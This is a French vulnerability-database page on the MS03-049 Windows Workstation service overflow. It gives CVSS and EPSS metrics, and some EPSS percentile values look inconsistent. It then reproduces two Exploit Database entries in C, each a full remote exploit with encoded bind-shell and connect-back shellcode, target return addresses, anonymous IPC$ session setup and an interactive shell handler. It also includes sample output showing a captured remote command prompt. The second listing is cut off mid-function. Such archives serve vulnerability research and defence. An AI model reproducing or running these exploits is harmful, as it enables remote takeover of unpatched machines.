Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | – | – | 91.86% | – | –
2023-03-12 | – | – | – | 96.75% | –
2023-05-28 | – | – | – | 96.96% | –
2024-04-28 | – | – | – | 96.9% | –
2024-06-02 | – | – | – | 96.9% | –
2024-09-15 | – | – | – | 96.86% | –
2024-12-22 | – | – | – | 95.82% | –
2025-01-19 | – | – | – | 95.82% | –
2025-03-18 | – | – | – | – | 84.71%
2025-03-30 | – | – | – | – | 85.32%
2025-03-30 | – | – | – | – | 85.32%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date | Percentile
2022-02-06 | 1%
2023-03-12 | 99%
2023-05-28 | 1%
2024-04-28 | 1%
2024-06-02 | 1%
2024-09-15 | 1%
2024-12-22 | 1%
2025-01-19 | 1%
2025-03-18 | 99%
2025-03-30 | 99%
2025-03-30 | 99%
Informations sur l'Exploit
Exploit Database EDB-ID : 123
Date de publication : 2003-11-13 23h00 +00:00
Auteur : snooq
EDB Vérifié : Yes
/*
* Author: snooq
* Date: 14 November 2003
*
* +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
*
* This is just slightly better than the one I posted to
* packetstorm....
*
* The public version will crash 'services.exe' immediately
* while this one crash it only when u exit from shell....
*
* I'm still trying to figure out a way to avoid the 'crash'
* all together... any ideas????
*
* Let me know if you hav trouble compiling this shit...
* I hope this could be a good e.g for u to try Win32
* exploitation..
*
* This code is crappy... if u know of a better way of doing
* things... pls tell me.......
*
* Otherwise, if you guys r keen... I'll be more than happy
* to go thru this in details wif u all... Meanwhile..enjoy!
*
* +++++++++++++++++++++++++++++++++++++++++++++++++
*/
#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
#pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"msvcrt")
#pragma comment (lib,"mpr")
#pragma warning (disable:4013)
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <lm.h>
/* Build-time defaults for the tool; main() lets most of them be overridden by switches. */
#define NOP 0x90
#define PORT 24876
/* 32-bit XOR key applied by changeip()/changeport() before values are patched into the payload arrays. */
#define KEY 0x99999999
#define ALIGN 1 // Between 0 ~ 3
#define TARGET 1
#define INTERVAL 3
#define TIME_OUT 20
/* Byte offsets where main()/changeip() patch values: PORT_OFFSET_1 into bindport[], PORT_OFFSET_2 and IP_OFFSET into connback[]. */
#define PORT_OFFSET_1 198
#define PORT_OFFSET_2 193
#define IP_OFFSET 186
#define SC_OFFSET 20 // Gap for some NOPs...
#define RET_SIZE 2026 // Big enuff to take EIP... ;)
#define SC_SIZE_1 sizeof(bindport)
#define SC_SIZE_2 sizeof(connback)
/* BSIZE is the size of the global request buffer `buff`; SSIZE is not referenced anywhere in this listing. */
#define BSIZE 2600
#define SSIZE 128
/* NOTE(review): getopt is declared as returning char and main() compares the result with EOF; that only works where plain char is signed. */
extern char getopt(int,char **,char*);
extern char *optarg;
/* Never set to non-zero in this listing; setalarm() loops on it. */
static int alarm_fired=0;
/* Library handle and resolved entry point, both filled in by sendstr(). */
HMODULE hMod;
FARPROC fxn;
/* t1 = thread running sendstr(), t2 = thread running setalarm(); see do_send(). */
HANDLE t1, t2;
/* Request buffer assembled in main() and handed to the remote call in sendstr(). */
char buff[BSIZE];
/*
 * Per-target table: a display name, one 32-bit address, and the DLL build the
 * author associates with that address. The field name suggests a "jmp esp"
 * location; each value is only meaningful for the exact DLL version listed
 * next to it. The last entry is marked by the author as a debugging dummy.
 * `v` is a spare instance used only for sizeof() in showtargets().
 */
struct {
char *os;
long jmpesp;
char *dll;
}
targets[] = {
{
"Window 2000 (en) SP4",
0x77e14c29,
"user32.dll 5.0.2195.6688"
},
{
"Window 2000 (en) SP1",
0x77e3cb4c,
"user32.dll 5.0.2195.1600"
},
{
"For debugging only",
0x41424344,
"dummy.dll 5.0.2195.1600"
}
}, v;
/*
* HD Moore's shellcode..... ;)
*/
char bindport[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
"\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
"\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
"\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
"\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
"\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
"\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
"\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
"\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
"\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
"\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
"\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
"\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
"\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
"\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
"\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
"\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
"\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
"\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
"\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
"\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
"\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
"\xc2\x5b\x91\x99";
char connback[]=
"\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
"\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
"\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
"\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
"\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
"\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
"\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
"\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
"\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
"\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
"\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
"\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
"\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
"\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
"\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
"\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
"\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
"\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
"\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
"\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
"\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";
/*
 * Write the message and a trailing newline to stdout, then end the process.
 * The exit status is 0 even though every caller uses this for failures.
 */
void err_exit(char *s) {
    fputs(s, stdout);
    putchar('\n');
    exit(0);
}
/*
* Ripped from TESO code and modifed by ey4s for win32
* and... lamer quoted it wholesale here..... =p
*/
void doshell(int sock) {
/*
 * Relay loop between the connected socket and this process's stdin/stdout.
 * It never returns: every exit path goes through err_exit(), which ends
 * the process.
 */
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec=1;
time.tv_usec=0;
while (1) {
/* Hand-built stand-in for an fd_set holding one socket: a count of 1, then the handle.
   Presumably relies on the Winsock fd_set layout - confirm. */
ul[0]=1;
ul[1]=sock;
/* Wait up to one second for the socket to become readable. */
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
/* Socket -> stdout (fd 1). */
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
err_exit("-> Connection closed...\n");
}
l=write(1,buf,l);
if (l<=0) {
err_exit("-> Connection closed...\n");
}
}
else {
/* Nothing readable within the timeout (or select failed): block on stdin (fd 0)
   and forward what was read. Pending socket data is not drained while blocked here. */
l=read(0,buf,sizeof(buf));
if (l<=0) {
err_exit("-> Connection closed...\n");
}
l=send(sock,buf,l,0);
if (l<=0) {
err_exit("-> Connection closed...\n");
}
}
}
}
/*
 * Overwrite the 4 bytes at connback + IP_OFFSET with inet_addr(ip) XOR KEY.
 * The result of inet_addr() is not checked, so an unparsable string is
 * patched in as whatever inet_addr() returns for it.
 */
void changeip(char *ip) {
char *ptr;
ptr=connback+IP_OFFSET;
/* Assume Little-Endianess.... */
/* Unaligned 32-bit store through a cast pointer into the char array. */
*((long *)ptr)=inet_addr(ip)^KEY;
}
/*
 * Patch a 16-bit port value into `code` at `offset`.
 *   code   - payload array to modify in place (bindport or connback in main())
 *   port   - port number; XORed with KEY before being stored
 *   offset - byte offset of the two-byte field inside `code`
 * No bounds check is made on `offset`.
 */
void changeport(char *code, int port, int offset) {
char *ptr;
ptr=code+offset;
port^=KEY;
/* Assume Little-Endianess.... */
/* The two bytes are written high byte first, then low byte. */
*ptr++=(char)((port>>8)&0xff);
*ptr++=(char)(port&0xff);
}
/* Print the one-line tool banner, surrounded by blank lines, to stdout. */
void banner() {
    fputs("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n", stdout);
}
/*
 * Print the banner and the command-line help, then end the process with
 * status 0. `s` is the program name shown on the "Usage:" line.
 */
void usage(char *s) {
    static const char *const help_lines[] = {
        "\t-r\tSize of 'return addresses'\n",
        "\t-a\tAlignment size [0~3]\n",
        "\t-p\tPort to bind shell to (in 'connecting' mode), or\n",
        "\t\tPort for shell to connect back (in 'listening' mode)\n",
        "\t-s\tShellcode offset from the return address\n",
        "\t-h\tTarget's IP\n",
        "\t-t\tTarget types. ( -H for more info )\n",
        "\t-H\tShow list of possible targets\n",
        "\t-l\tListening for shell connecting\n",
        "\t\tback to port specified by '-p' switch\n",
        "\t-i\tIP for shell to connect back\n",
        "\t-I\tTime interval between each trial ('connecting' mode only)\n",
        "\t-T\tTime out (in number of seconds)\n\n",
        "\tNotes:\n\t======\n\t'-h' is mandatory\n",
        "\t'-i' is mandatory if '-l' is specified\n\n"
    };
    size_t k;

    banner();
    printf("Usage: %s [options]\n", s);
    /* None of the fixed lines contains a conversion, so fputs() emits the same bytes. */
    for (k = 0; k < sizeof(help_lines) / sizeof(help_lines[0]); k++) {
        fputs(help_lines[k], stdout);
    }
    exit(0);
}
/*
 * Print the banner and every entry of targets[] (1-based index, name,
 * address, DLL build), then end the process with status 0.
 */
void showtargets() {
    int idx = 0;
    const int count = sizeof(targets) / sizeof(v);

    banner();
    printf("Possible targets are:\n");
    printf("=====================\n");
    while (idx < count) {
        printf("%d) %s", idx + 1, targets[idx].os);
        printf(" --> 0x%08x (%s)\n", targets[idx].jmpesp, targets[idx].dll);
        idx++;
    }
    exit(0);
}
/*
 * Open an anonymous session to \\host\ipc$ and invoke netapi32's
 * NetValidateName against that host, passing the global `buff` as the name
 * argument. Run on its own thread by do_send().
 *
 * Defender view: the network-visible sequence is an IPC$ connection with an
 * empty user name and password followed by a name-validation request that
 * carries a multi-kilobyte name. MS03-049 is the vendor fix referenced on this
 * page; restricting anonymous (null) sessions and filtering SMB from untrusted
 * networks remove the precondition.
 */
void sendstr(char *host) {
WCHAR wStr[128];
char ipc[128], hStr[128];
DWORD ret;
NETRESOURCE NET;
/* Neither the module handle nor the resolved address is checked for NULL. */
hMod=LoadLibrary("netapi32.dll");
fxn=GetProcAddress(hMod,"NetValidateName");
/* Build "\\host\ipc$" and "\\host"; the buffers are not pre-zeroed and _snprintf
   does not NUL-terminate when the output is truncated at 127 bytes. */
_snprintf(ipc,127,"\\\\%s\\ipc$",host);
_snprintf(hStr,127,"\\\\%s",host);
MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));
NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;
printf("-> Setting up $IPC session...(aka 'null session')\n");
/* Empty password and empty user name: an anonymous ("null") session. */
ret=WNetAddConnection2(&NET,"","",0);
if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
else printf("-> IPC$ session setup successfully...\n");
printf("-> Sending exploit string...\n");
/* `buff` is a char array passed where the API takes a wide string; the return value is stored but never examined. */
ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);
}
/* Timer callback registered by setalarm(): prints a give-up message and ends the process via err_exit(). None of the callback arguments is used. */
VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
err_exit("-> I give up...dude.....");
}
/*
 * Arm a timer of `timeout` seconds and pump messages so that alrm_bell() runs
 * when it expires. Run on its own thread by do_send().
 */
void setalarm(int timeout) {
MSG msg = { 0, 0, 0, 0 };
/* SetTimer takes milliseconds. */
SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);
/* alarm_fired is never set in this listing, so the loop ends only when the
   process exits (alrm_bell) or the thread is terminated (resetalarm). */
while(!alarm_fired) {
if (GetMessage(&msg, 0, 0, 0) ) {
if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
DispatchMessage(&msg);
}
}
}
/*
 * Forcibly stop the timeout thread (t2) and then the sending thread (t1).
 * Either failure ends the process through err_exit(). TerminateThread gives
 * the target thread no chance to release anything it holds.
 */
void resetalarm() {
if (TerminateThread(t2,0)==0) {
err_exit("-> Failed to reset alarm...");
}
if (TerminateThread(t1,0)==0) {
err_exit("-> Failed to kill the 'sending' thread...");
}
}
/*
 * Start two worker threads: t1 runs sendstr(host) and t2 runs
 * setalarm(timeout). The handles are kept in globals for resetalarm().
 * NOTE(review): both functions are passed to _beginthread without a cast
 * although their signatures differ from the thread-start prototype, and
 * `timeout` is passed as the thread argument by value.
 */
void do_send(char *host,int timeout) {
t1=(HANDLE)_beginthread(sendstr,0,host);
if (t1==0) { err_exit("-> Failed to send exploit string..."); }
t2=(HANDLE)_beginthread(setalarm,0,timeout);
if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}
/*
 * Entry point: parse switches, assemble the global request buffer `buff`,
 * start the sending and timeout threads, then either wait for an inbound
 * connection ('listening' mode, -l) or poll an outbound one ('connecting'
 * mode, the default) and hand the socket to doshell().
 */
int main(int argc, char *argv[]) {
char opt;
char *host, *ptr, *ip="";
struct sockaddr_in sockadd;
int i, i_len, ok=0, mode=0, flag=0;
int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
int target=TARGET, scsize=SC_SIZE_1, port=PORT;
int timeout=TIME_OUT, interval=INTERVAL;
long retaddr;
WSADATA wsd;
SOCKET s1, s2;
if (argc<2) { usage(argv[0]); }
/* All numeric switches go through atoi() with no range validation. */
while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
switch(opt) {
case 'a':
align=atoi(optarg);
break;
case 'I':
interval=atoi(optarg);
break;
case 'T':
timeout=atoi(optarg);
break;
case 't':
target=atoi(optarg);
retaddr=targets[target-1].jmpesp;
break;
case 'i':
ip=optarg;
/* Patches the connect-back address into connback[] immediately. */
changeip(ip);
break;
case 'l':
/* 'Listening' mode: use the connback payload size instead of bindport's. */
mode=1;
scsize=SC_SIZE_2;
break;
case 'r':
retsize=atoi(optarg);
break;
case 's':
sc_offset=atoi(optarg);
break;
case 'h':
ok=1;
host=optarg;
sockadd.sin_addr.s_addr=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'H':
showtargets();
break;
default:
usage(argv[0]);
break;
}
}
/* -h is mandatory; -i is additionally required when -l was given. */
if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
/* Pre-fill the whole buffer with the NOP byte, then write `retaddr` every four
   bytes starting at buff+align for `retsize` bytes.
   NOTE(review): this loop runs before the size check further down, so an
   oversized -r value writes past the end of `buff` in this process. */
memset(buff,NOP,BSIZE);
ptr=buff+align;
for(i=0;i<retsize;i+=4) {
*((long *)ptr)=retaddr;
ptr+=4;
}
if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
err_exit("-> WSAStartup error....");
}
/* NOTE(review): SOCKET is presumably unsigned on Win32, in which case this
   "<0" test can never be true - confirm against INVALID_SOCKET. */
if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
err_exit("-> socket() error...");
}
sockadd.sin_family=AF_INET;
sockadd.sin_port=htons((SHORT)port);
/* Position where the selected payload array is copied; rejected if it would not fit in BSIZE. */
ptr=buff+retsize+sc_offset;
if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
banner();
if (mode) {
/* 'Listening' mode: patch the port into connback[], copy it into buff, send,
   then bind/listen/accept locally on that port. */
printf("-> 'Listening' mode...( port: %d )\n",port);
changeport(connback, port, PORT_OFFSET_2);
for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
do_send(host,timeout);
Sleep(1000);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
i_len=sizeof(sockadd);
if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
err_exit("-> bind() error");
}
if (listen(s1,0)<0) {
err_exit("-> listen() error");
}
printf("-> Waiting for connection...\n");
s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
if (s2<0) {
err_exit("-> accept() error");
}
printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
/* Stop the timeout and sending threads before entering the relay loop. */
resetalarm();
doshell(s2);
}
else {
/* 'Connecting' mode: patch the port into bindport[], copy it into buff, send,
   then retry connect() every `interval` seconds. The loop has no attempt limit
   of its own; only the timeout thread (alrm_bell) ends the process. */
/* The format string has no conversion for the extra `port` argument. */
printf("-> 'Connecting' mode...\n",port);
changeport(bindport, port, PORT_OFFSET_1);
for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
do_send(host,timeout);
Sleep(1000);
printf("-> Will try connecting to shell now....\n");
i=0;
while(!flag) {
Sleep(interval*1000);
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
printf("-> Trial #%d....\n",i++);
}
else { flag=1; }
}
printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
resetalarm();
doshell(s1);
}
return 0;
}
// milw0rm.com [2003-11-14]
Exploit Database EDB-ID : 130
Date de publication : 2003-12-03 23h00 +00:00
Auteur : fiNis
EDB Vérifié : Yes
/* To build new netapi32.lib
pedump /exp netapi32.dll > netapi32.exp
buildlib netapi32.exe netapi32.exp netapi32.lib netapi32.dll
d:\>rpc_wks_bo.exe
WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
-------------------------------------------------------------------
Usage: rpc_wks_bo.exe [-ht]
-h <IP> : Target IP
-t <Type> : Target type (-t0 for a list)
d:\>rpc_wks_bo.exe -t0
Possible targets are:
============================
1) Window XP Pro + SP0 [Rus]
2) Window XP Pro + SP1 [Rus]
3) Crash all
d:\>rpc_wks_bo.exe -h 192.168.100.7 -t1
[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[+] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[+] Socket initialized - OK
[+] Try connecting to 192.168.100.7:9191 ...
[*] Connected to shell at 192.168.100.7:9191
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\WINDOWS\system32>
*/
/**************** Public version *****************/
#include <stdio.h>
#include <io.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#pragma lib <ws2_32.lib>
#pragma lib <netapi32.lib>
#pragma lib <mpr.lib>
/* Seconds cmdshell2() waits in select() before falling through to stdin. */
#define RECVTIMEOUT 1
#define VER "0.1.4"
/* NOTE(review): getopt is declared as returning char and main() compares the result with EOF; that only works where plain char is signed. */
extern char getopt(int,char **,char*);
extern char *optarg;
// ------------------------------------------------
/* Local prototype for the netapi32 export called in send_exp(); declared here with a void return type. */
void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount,
wchar_t *DomainAccountPassword, unsigned int Reserved);
void send_exp();
// ----------Lamers buff =) ----------------------------
/* Request string built in main() (narrow form) and its wide-character conversion. */
char expl[3000];
wchar_t expl_uni[6000];
/* "\\host" and "\\host\ipc$" strings.
   NOTE(review): both narrow buffers are 30 bytes, but main() formats into them
   with a limit of 127, so a long -h argument overruns them in this process. */
char tgt_net[30];
wchar_t tgt_net_uni[60];
char ipc[30];
// -----------------------------------------------------
/*
 * Per-target table: display name plus one 32-bit address (the field name
 * suggests a "jmp esp" location). `tgt_type` is a spare instance used for
 * sizeof() in showtargets(); main() declares a local int of the same name.
 */
struct {
char *os;
long jmpesp;
}
targets[] = {
{ "Window XP + SP0 [Rus] ", 0x77f5801c }, // 0x77d6754a(user32.dll)
{ "Window XP + SP0 + Rollup [Rus] ", 0x77f98db7 }, //0x77d639ab-work 0x77fb59cc - sp1
{ "Window XP + SP1 [Rus] ", 0x77fb59cc },
{ "Window XP + SP1 + Rollup [Rus] ", 0x77f9980f }, // 0x77d637db(user32.dll)
{ "Crash all ", 0x41424344 }
}, tgt_type;
unsigned char shellcode[] = // bind shell at 9191 port (484 bytes) // ripped =)
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33"
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C"
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE"
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB"
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77"
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77"
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77"
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77"
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77"
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77"
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77"
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77"
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77"
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB"
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C"
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0"
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77"
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0"
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB"
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5"
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98"
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE"
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77"
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8"
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90"
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74"
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4"
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94"
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5"
"\xD3\x4A\x8C\x88";
/***************************************************************/
/* Print the tool banner (including the VER string) and a separator line to stdout. */
void banner() {
    printf("\nWKS service remote exploit by fiNis (fiNis[at]bk[dot]ru), ver:%s\n", VER);
    fputs("-------------------------------------------------------------------\n", stdout);
}
/* List every entry of targets[] with a 1-based index, then end the process with status 1. */
void showtargets() {
    int idx = 0;
    const int count = sizeof(targets) / sizeof(tgt_type);

    printf("Possible targets are:\n");
    printf("============================\n");
    while (idx < count) {
        printf("%d) %s\n", idx + 1, targets[idx].os);
        idx++;
    }
    exit(1);
}
/*
 * Print the banner and the two-option help text, then end the process with
 * status 1. `prog` is the program name shown on the "Usage:" line.
 */
void usage(char *prog) {
    banner();
    printf("Usage: %s [-ht]\n", prog);
    /* Fixed lines without conversions: fputs() emits the same bytes. */
    fputs("\t-h <IP> : Target IP\n", stdout);
    fputs("\t-t <Type> : Target type (-t0 for a list)\n", stdout);
    exit(1);
}
/***************************************************************/
/*
 * Turn a dotted-quad string or host name into an IPv4 address value.
 * Returns the address as produced by inet_addr() or copied from the resolver
 * result. On resolution failure it prints a message, calls WSACleanup() and
 * ends the process with status 1.
 */
long gimmeip(char *hostname)
{
struct hostent *he;
long ipaddr;
/* NOTE(review): the inet_addr() result is stored in a signed long and tested
   with "< 0", presumably to detect the failure value. With a 32-bit long,
   any valid address whose stored value has the top bit set also takes the
   resolver path below - confirm. */
